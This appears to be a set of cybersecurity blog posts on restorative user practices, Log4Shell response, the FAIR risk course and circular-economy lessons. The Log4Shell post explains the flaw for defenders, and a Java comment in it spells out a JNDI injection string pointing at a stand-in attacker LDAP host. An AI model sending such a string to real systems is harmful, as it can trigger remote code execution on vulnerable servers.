Rethinking Cybersecurity: Challenging the Commoditisation and Embracing Restorative Practices
Since I started in cybersecurity, I have observed that the field has become dominated by insincere vendors and practitioners driven solely by profit. As a cybersecurity leader, I have also noticed its increasing commoditisation over the years, and it is important for us to address this issue.
Going deeper into my motives, I realised the significance of my blog’s title. I initially chose the name to reflect the current state of cybersecurity, where my work felt repetitive and inconsequential, like an assembly line: regardless of the organisation, the same recurring non-technical issues persisted.
The primary challenge lies in the way security practitioners interact with the people they are meant to protect within these organisations. Those outside the security team are often victim-shamed and blamed for their perceived ignorance, as if they were at fault for not prioritising cybersecurity in their daily work.
Security organisations sometimes oppress the very people they are meant to serve. This behaviour struck me as counterproductive and degrading, particularly as I familiarised myself with nonviolent communication and other conflict-resolution techniques. I wondered whether adopting peacebuilding methods could foster collaboration and alignment among stakeholders. While only a few security practitioners initially showed interest, the transition to DevOps and shift-left strategies, which emphasise these attributes, attracted like-minded individuals.
Additionally, the way users are treated resembles the punitive and shaming approach commonly seen in the criminal justice system, an approach that has neither reduced crime nor supported victims. Restorative justice, on the other hand, which focuses on repairing the harm caused by crime and restoring the community while respecting the dignity of all involved parties, has shown promise.
Evidence suggests that traditional fear-based and shaming tactics have not been effective at promoting user compliance in cybersecurity. Instead, creating a supportive workplace environment has been identified as a more effective way to encourage voluntary security behaviours.
In the rapidly evolving landscape of cybersecurity, organisations must adapt their approaches. Rather than relying on fear, uncertainty, and doubt (FUD)-based strategies, we must acknowledge the value of users as allies and reposition cybersecurity as a collaborative effort. This involves a fundamental shift in the industry, prioritising collaboration, understanding, and support to foster a culture of proactive cybersecurity measures. By moving away from fear-based tactics and embracing a more cooperative approach, organisations will be better equipped to mitigate threats and safeguard information.
On 10th Dec 2021, a zero-day vulnerability was announced in Apache’s Log4j library, making Log4Shell one of the most severe vulnerabilities since Heartbleed. Exploiting it is trivial, and we have therefore seen new exploits daily since the announcement. Some of us will be spending this holiday period mitigating this vulnerability.
Since the announcement last weekend, a lot has been written about Log4Shell. Researchers are finding new exploits in the wild and are adjusting the response. I am not trivialising the extent and impact of this vulnerability with the title of this post. Still, I would like to suggest taking a step back, bringing some calm and strategising the mitigation plan. We are in the early stages of the response, and if the past week is any indication, we are here for the long haul.
In this post, I will focus on two aspects of this zero-day. The technical aspect is, of course, paramount and requires immediate attention. However, long-term governance is equally important and will ensure that we are not blindsided by that one seemingly insignificant application which was ignored or seen as low-risk.
So, what is the Log4Shell vulnerability?
Apache’s Log4j, an open-source Java-based logging framework, is commonly used by many apps and services. An attacker can use a well-crafted exploit against it to break into the target system, steal credentials and logins, infect networks, and exfiltrate data. Because the library is used worldwide across software applications and online services, and the vulnerability requires very little expertise to exploit, the impact is far-reaching. These consequences make Log4Shell potentially the most severe computer vulnerability in years.
“Log4Shell” (CVE-2021–44228) is the name given to the vulnerability in the Log4j library. Apache Log4j 2 versions 2.14.1 and below are susceptible to a remote code execution vulnerability that a remote attacker can leverage to take full control of a vulnerable machine. Log4Shell is exploited by injecting a JNDI (Java Naming and Directory Interface) LDAP string into the logs, triggering Log4j to contact the specified LDAP server for more information.
In a malicious scenario, the attacker can use that LDAP server to serve malicious code back to the victim’s machine, where it is then automatically executed in memory. Data supplied by an untrusted entity, merely intended to be logged to a file, can end up taking over the logging server. What starts as a routine instruction to log activity can, if exploited, quickly become a data-leak or remote code execution scenario.
Simply put, an event log intended and required for completeness could turn into a malware-implantation event. This is nasty and requires taking all necessary steps to ensure that you don’t fall victim to it.
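To make the mechanism concrete, here is a minimal, hypothetical sketch of the vulnerable pattern (the class name, user value and attacker domain are illustrative only): an application logs attacker-controlled input, and on affected Log4j 2.x versions the message lookup resolves a JNDI reference embedded in that input.

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LoginController {
    private static final Logger LOGGER = LogManager.getLogger(LoginController.class);

    public void handleFailedLogin(String username) {
        // Logging attacker-controlled input. On vulnerable Log4j 2.x versions,
        // a value such as "${jndi:ldap://attacker.example.com/a}" triggers a
        // JNDI lookup to the attacker's LDAP server when the message is formatted.
        LOGGER.info("Failed login attempt for user: {}", username);
    }
}
```

The point is that nothing in the application code looks obviously unsafe; the danger lives in how the logging framework formats the message.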
Am I affected?
Overwhelmingly “yes”, unless proven otherwise. Almost every software product or service has some sort of logging capability; software behaviour is logged for development, operational and security purposes, and Apache’s Log4j is a very common component used for this.
For individuals, Log4Shell will almost certainly affect you, because most of the devices and services you use online daily will be impacted. Keep an eye on updates and instructions from the vendors of these devices and services over the next few days and weeks, and as soon as a vendor releases a patch, update to mitigate the risk.
For businesses, it is going to be very tricky, and the true impact may not be clear immediately. Even though Apache has already recommended upgrading to version 2.17, there may be various implementations of the Log4j library in your estate. So again, keep an eye out for vendors releasing patches and install them as soon as possible.
How do you find out whether your server is impacted?
The answer to this question is not straightforward. It is challenging to determine whether a given server in your network is affected. You might assume that only public-facing servers running Java code, where incoming requests are handled by Java software and the Java runtime libraries, are exposed, and that you can consider yourself safe if the frontend is built on products such as Apache HTTPd, Microsoft IIS or Nginx, since these servers are coded in C or C++.
As more information emerges on the breadth and depth of this vulnerability, it is clear that Log4Shell is not limited to servers coded in Java. Because it is not a vulnerability in TCP socket-handling code, it can stay hidden anywhere in the network where user-supplied data is processed and logged, even when the frontend is a non-Java platform. You may get caught between what you know about your own code and all those third-party Java libraries that form part of the overall application and may be vulnerable.
Ideally, every Java application on your network should be evaluated for the presence of the Log4j library. You can take the following two approaches:
1. Search for Vulnerable Code: Scan all servers and applications for vulnerable versions of the Log4j libraries. Since Log4j code can be buried deep inside a Java archive, a basic search for “log4j” is not good enough; to be certain, you may have to use additional tools and techniques, or a quick runtime check like the sketch after this list. Two open-source scanning tools can list code versions and vulnerable code:
• Grype (https://github.com/anchore/grype) — searches libraries installed on a system and displays the vulnerabilities present
• Syft (https://github.com/anchore/syft) — searches for installed code and libraries and displays their versions
2. Active Scanning of Deployed Code: Nessus with updated plugins can be used for active vulnerability scanning to confirm whether the vulnerability exists. Some security vendors have also set up public websites to conduct minimal testing against your environment, and several other open-source and commercial tools support this kind of active scanning.
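As a complement to the scanners above, here is a minimal sketch of a runtime check, assuming it runs with the same classpath as the application being assessed: it looks for the JndiLookup class that performs the dangerous resolution and reports the log4j-core version from the jar manifest (which may be absent in repackaged jars). It is not a substitute for proper scanning.

```java
public class Log4jCheck {
    public static void main(String[] args) {
        try {
            // JndiLookup is the log4j-core class that performs the JNDI resolution
            // abused by Log4Shell; if it cannot be loaded, this classpath is not exposed.
            Class<?> jndiLookup =
                Class.forName("org.apache.logging.log4j.core.lookup.JndiLookup");
            Package pkg = jndiLookup.getPackage();
            String version = (pkg != null) ? pkg.getImplementationVersion() : null;
            System.out.println("JndiLookup is present on the classpath; "
                + "log4j-core version: " + (version != null ? version : "unknown"));
        } catch (ClassNotFoundException e) {
            System.out.println("JndiLookup not found on this classpath.");
        }
    }
}
```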
How can I mitigate Log4Shell and prevent an attack?
In principle, the detection and prevention techniques are no different from the response to any other zero-day. The vulnerability is trivial to trigger, but that does not necessarily mean it can be successfully exploited everywhere: several pre- and post-conditions must be met for a successful attack. Pre-conditions such as the JVM being used, the server and application configuration, and the version of the library will determine whether exploitation succeeds. On 17th Dec, the Apache Foundation announced that the original fix was incomplete and released a further fix in version 2.17.0.
At the time of writing this post, the following is the current list of vulnerabilities and recommended fixes:
• CVE-2021–44228 (CVSS score: 10.0) — A remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.14.1 (fixed in version 2.15.0)
• CVE-2021–45046 (CVSS score: 9.0) — An information leak and remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.15.0, excluding 2.12.2 (fixed in version 2.16.0)
• CVE-2021–45105 (CVSS score: 7.5) — A denial-of-service vulnerability affecting Log4j versions from 2.0-beta9 to 2.16.0 (fixed in version 2.17.0)
• CVE-2021–4104 (CVSS score: 8.1) — An untrusted deserialization flaw affecting Log4j version 1.2 (no fix available; upgrade to version 2.17.0)
The Swiss Government’s CERT provides quite a good visualisation of the attack sequence recommending mitigations for each of the vulnerable points in the sequence.
Where to from here?
Keep Calm and Carry On… We are here for the long haul, and there is no easy fix. You may fix one app or server today, only for something else to pop up the next morning. If you have not done so yet, the best thing to do is set up a generic incident response playbook for zero-day vulnerabilities. This will help you respond to any such event in the future in a systematic way. The key to success is keeping an eye on the tools and techniques and their effectiveness in responding to any new zero-day.
As far as Log4Shell is concerned, we are still in the early days and cannot be sure that, once patched, there will never be something else. This is evident from the fact that in the week or so since the announcement of the original CVE, three more have been attributed to the Log4j libraries. The Apache Foundation has recommended the following mitigations to prevent the exploitation of vulnerable code.
First, upgrade vulnerable versions of Log4j to version 2.17.0 or apply vendor-supplied patches. If, for some reason, it is not possible to upgrade, some workarounds can be used; however, there is always a risk that additional vulnerabilities (such as CVE-2021–45046) will make the workarounds ineffective, so it is best to upgrade to version 2.17. In addition, some common mitigations must be considered and applied:
• Isolate systems by restricting them to their own security zones, i.e. DMZs or VLANs.
• Block all outbound network connections from servers unless required for their functional role; even then, restrict outbound connections to trusted hosts and network ports only.
• Depending on your endpoint protection strategy, update any signatures or plugins to prevent Log4j exploitation.
• Continuously monitor networks and servers for any indicators of compromise (IOCs).
• The vulnerability has been seen to persist even after a patch is implemented, so testing and retesting after patching must be part of the mitigation plan.
In the times we live in, such events have become the norm. Vulnerable code, unfortunately, is inevitable, and there will always be someone keen to identify such code and exploit it for their own interests. It is only a matter of time before we are hacked, and that one incident may disrupt your business. It is therefore paramount to develop and implement business continuity plans that can minimise the impact of such an event. These plans must be updated and tested regularly against changing threat scenarios. Security incident response plans must be practised regularly as a “way of life” and adjusted whenever a new vulnerability or threat scenario is identified.
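As an illustration of the kind of interim workaround mentioned above, the sketch below shows the widely circulated formatMsgNoLookups setting for Log4j 2.10 and later, assuming it can be applied before any logger is initialised. Apache has noted that this does not cover every case (for example, CVE-2021–45046 in certain non-default configurations), so upgrading remains the real fix.

```java
public class Bootstrap {
    public static void main(String[] args) {
        // Interim workaround for CVE-2021-44228 on Log4j >= 2.10: disable message
        // lookups before any logger is initialised. Equivalent JVM flag:
        //   -Dlog4j2.formatMsgNoLookups=true
        // Apache has noted this does NOT address CVE-2021-45046 in all configurations,
        // so it only buys time; upgrade to 2.17.0 or later as soon as possible.
        System.setProperty("log4j2.formatMsgNoLookups", "true");

        // ... start the application as usual ...
    }
}
```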
In situations like the Log4j zero-day, one can get overwhelmed by the sheer volume of work needed to protect ourselves. As Huntress Labs senior security researcher John Hammond said, “All threat actors need to trigger an attack is one line of text,” but the responders need to spend hours, days and weeks protecting themselves. In such overwhelming scenarios, I recommend taking a deep breath and keeping calm while doing what we need to do. Reach out to people, and don’t be shy about asking for help if you are stressed. I wish all the best to those of you who will be staying back during the holiday to keep your businesses protected.
I did the FAIR Analysis Fundamentals course a few years ago, and here are my thoughts on it.
FAIR stands for Factor Analysis of Information Risk, and is the only international standard quantitative model for information security and operational risk. (https://www.fairinstitute.org/)
My interest in learning more about FAIR came from two observations.
The first was that we had many definitions of what constitutes risk. We refer to “script-kiddies” as risks. Not having a security control is referred to as a risk. SQL injection is a risk. We also said things like “How much risk is there with this risk?”
The other observation was about our approach to quantifying risk. We derived the level of risk from likelihood and impact, and sometimes it was hard to get agreement on those values.
Having completed the course, one of the things I like about FAIR is its definitions: what a risk is, and what it must include. A risk should include an asset, a threat, and an effect, with an optional method. An example of a risk is the probability of malicious internal users impacting the availability of our customer booking system via denial of service.
It uses future loss as the unit of measurement rather than a rating of critical, high, medium or low. The value of future loss is expressed as a range with a most likely value, along with the confidence level of that most likely value. As such, it focuses on accuracy rather than precision, which I quite like, as it makes risks easier to understand and compare. Reporting that a risk has a 1-in-2-year probability of happening with a loss between $20K and $50K, most likely around $30K, is a lengthy statement. However, it is more tangible and makes more sense than reporting that the risk is simply “High”.
Now it sounds like I’m all for FAIR, but I have some reservations. The main one is that there isn’t always data available to determine such an empirical result. Risk, according to FAIR, is calculated by multiplying loss event frequency (the number of times a loss event will occur in a year) by loss magnitude (the dollar range of loss from productivity, replacement, response, compliance and reputation). It is hard to come up with a loss frequency value when there is no past data to base it on; I would be guessing the value, not estimating it. FAIR suggests estimating a sub-factor if there isn’t enough reliable data available, but I see the same problem there. The sub-factors for loss frequency are the number of times threat actors attempt to affect the asset, multiplied by the percentage of attempts that succeed. Unless you have that data, that is no easier to determine.
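To show what the frequency-times-magnitude calculation looks like in practice, here is a minimal sketch of a Monte Carlo estimate using the illustrative numbers from above (roughly a 1-in-2-year event, losses between $20K and $50K, most likely $30K). The triangular distribution and all the inputs are assumptions for illustration, a simplification of the calibrated ranges FAIR tooling typically uses.

```java
import java.util.Random;

public class FairMonteCarlo {
    // Hypothetical, illustrative inputs (not from any real dataset):
    // loss event frequency in events per year, and loss magnitude per event in dollars.
    static final double FREQ_MIN = 0.2, FREQ_LIKELY = 0.5, FREQ_MAX = 1.0;
    static final double LOSS_MIN = 20_000, LOSS_LIKELY = 30_000, LOSS_MAX = 50_000;

    // Sample from a triangular distribution: a simple stand-in for FAIR's calibrated ranges.
    static double triangular(Random r, double min, double mode, double max) {
        double u = r.nextDouble();
        double c = (mode - min) / (max - min);
        return (u < c)
                ? min + Math.sqrt(u * (max - min) * (mode - min))
                : max - Math.sqrt((1 - u) * (max - min) * (max - mode));
    }

    public static void main(String[] args) {
        Random r = new Random(42);
        int trials = 100_000;
        double total = 0;
        for (int i = 0; i < trials; i++) {
            // Annualised loss for this trial = simulated frequency x simulated magnitude.
            total += triangular(r, FREQ_MIN, FREQ_LIKELY, FREQ_MAX)
                   * triangular(r, LOSS_MIN, LOSS_LIKELY, LOSS_MAX);
        }
        System.out.printf("Simulated average annualised loss: $%.0f%n", total / trials);
    }
}
```

Even a toy simulation like this makes the point: the output is only as good as the frequency and magnitude estimates that go in.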
Overall, it still feels like a much better way of quantifying risk. I’ll end with a quote from the instructor: “Risk statements should be of probability, not of predictions or what’s possible.” It resonated with me because it is something I too often forget.
Cybersecurity and the Circular Economy (CE) are not terms usually heard together. Cybersecurity is often associated with hacking, loss of privacy or phishing, while CE is about climate change and environmental protection. However, cybersecurity can learn quite a few things from CE, and this post focuses on what CE can teach us about cybersecurity sustainability.
In the times we live in, our economy depends on taking materials from the Earth’s natural resources, creating products that we use, misuse, and eventually throw away as waste. This linear process creates tons of waste every day, presenting sustainability, environmental and climate change challenges. CE, on the other hand, strives to stop this waste and pollution, retrieve and circulate materials, and, more importantly, recharge and regenerate nature. Renewable energy and materials are key components of CE, making it a resilient system that detaches economic activity from the consumption of products.
CE is not a new concept, but it was popularised by the British sailor Ellen MacArthur, whose charity advises governments and organisations on CE. Her foundation’s “butterfly diagram” illustrates the continuous flow of materials within the economy. CE has two main cycles, the technical and the biological. In the technical cycle, materials are repaired, reused, repurposed and recycled to keep products circulating in the economy. In the biological cycle, biodegradable organic materials are returned to the Earth through decomposition, allowing nature to regenerate and continuing the cycle.
As noted above, the lack of a circular economy can be devastating for the planet. The humongous amount of waste humans produce, littering everything around us, is unsustainable and devastating for humans and the other inhabitants of Earth. Similarly, with the ever-increasing cost of cyber-attacks and breaches, businesses are vulnerable to extinction. According to the Cost of a Data Breach Report 2021, commissioned by IBM Security and the Ponemon Institute, the cost of breaches increased by 10% in 2021, the largest single year-on-year increase. Lost business represents 38% of breach costs, covering customer turnover, revenue loss, downtime, and the increased cost of acquiring new business due to a diminished reputation.
Sustainability is about using and/or reusing something for an extended period without reducing its capability, from short- to long-term perspectives. Cybersecurity is sustainable if the implemented security resources do not degrade or become ineffective at mitigating security threats over time. Achieving sustainability is not easy and most certainly is not cheap; organisations must take a principles-based approach to cybersecurity. Just as manufacturing within CE considers sustainability from the ground up, security must be part of the design and production phases of products. A system should be reliable enough to keep providing its stated function; for example, a firewall should continue to block potential attacks even after a hardware failure, or after a hacker has taken advantage of a zero-day to compromise your environment.
By nature, digital systems produce an enormous amount of data, including security-specific signals. Unfortunately, finding the needle in that haystack is challenging and often overwhelmingly laborious. In CE, we have found ways to segregate different types of waste right at the source, making it easier to collect, recycle and repurpose them faster. Similarly, systems should be designed to separate relevant security data from other information at the source, rather than leaving that to downstream security systems. Segregation at source helps reduce false positives and negatives, providing reliable and accurate information that can be used for protection. Improved data accuracy also helps prioritise response and recovery activities during a security incident.
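As a small illustration of what segregation at source can look like in application code, here is a minimal sketch using Log4j 2 markers. The class, method and marker names are hypothetical, and the appender routing (for example, a MarkerFilter sending tagged events to a security-only destination) is assumed to live in the logging configuration, which is not shown.

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.Marker;
import org.apache.logging.log4j.MarkerManager;

public class PaymentService {
    private static final Logger LOGGER = LogManager.getLogger(PaymentService.class);
    // A dedicated marker lets the logging configuration route these events to a
    // separate, security-only appender (e.g. a SIEM forwarder).
    private static final Marker SECURITY = MarkerManager.getMarker("SECURITY");

    public void recordFailedAuthorisation(String accountId) {
        // Tagged at source: security data is separated from ordinary application
        // logs here, not by the downstream security tooling.
        LOGGER.warn(SECURITY, "Failed payment authorisation for account {}", accountId);
    }

    public void recordSuccessfulAuthorisation(String accountId) {
        // Ordinary operational event, no security marker.
        LOGGER.info("Payment authorised for account {}", accountId);
    }
}
```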
CE’s design principles clearly define its two distinct cycles (technical and biological), as mentioned above, to deal with non-biodegradable and biodegradable materials. These cycles ensure that a product’s value is maintained, where possible, by repairing, reusing or recycling non-biodegradable materials, while biodegradable materials are returned to nature through processes such as composting. In cybersecurity, despite “Secure by Design” principles having been around conceptually for a long time, systems, including security products and platforms, often ignore them in the name of convenience and ease of use. Any decent security architecture should ensure that the design process inherently considers threat modelling to assess risk, and that the implemented systems are modular, retaining their value for as long as possible. This will help guarantee that cybersecurity products, platforms and services produce the desired outcome and are aligned with the organisation’s business requirements. There should always be an option to repurpose or recycle components to preserve the return on security investment.
The technical cycle in CE is resilient to dynamic change. As discussed above, CE is largely detached from economic conditions and continues to hold value until a product can no longer be repaired, reused or repurposed; at that point, its materials can be recycled into new products, recovering and preserving their value. Cyber resiliency is not new, but it is being contextualised in recent times by redefining its outcomes. As we know, cyber threat paradigms are continually changing, and only resilient systems can withstand such dynamics. Resilient cybersecurity helps an organisation recover efficiently from known or unknown security breaches. Like CE’s technical cycle, achieving effective resiliency takes a long time: it starts with implementing and maintaining baseline cybersecurity controls. Redundancy and resiliency go hand in hand, so redundancy should be included by design.
I am sure we can learn many more things from CE to set up a sustainable and resilient cybersecurity programme that is self-healing and self-organising, ensuring that systems can stop security breaches. I would like to know what else you think we can learn from CE.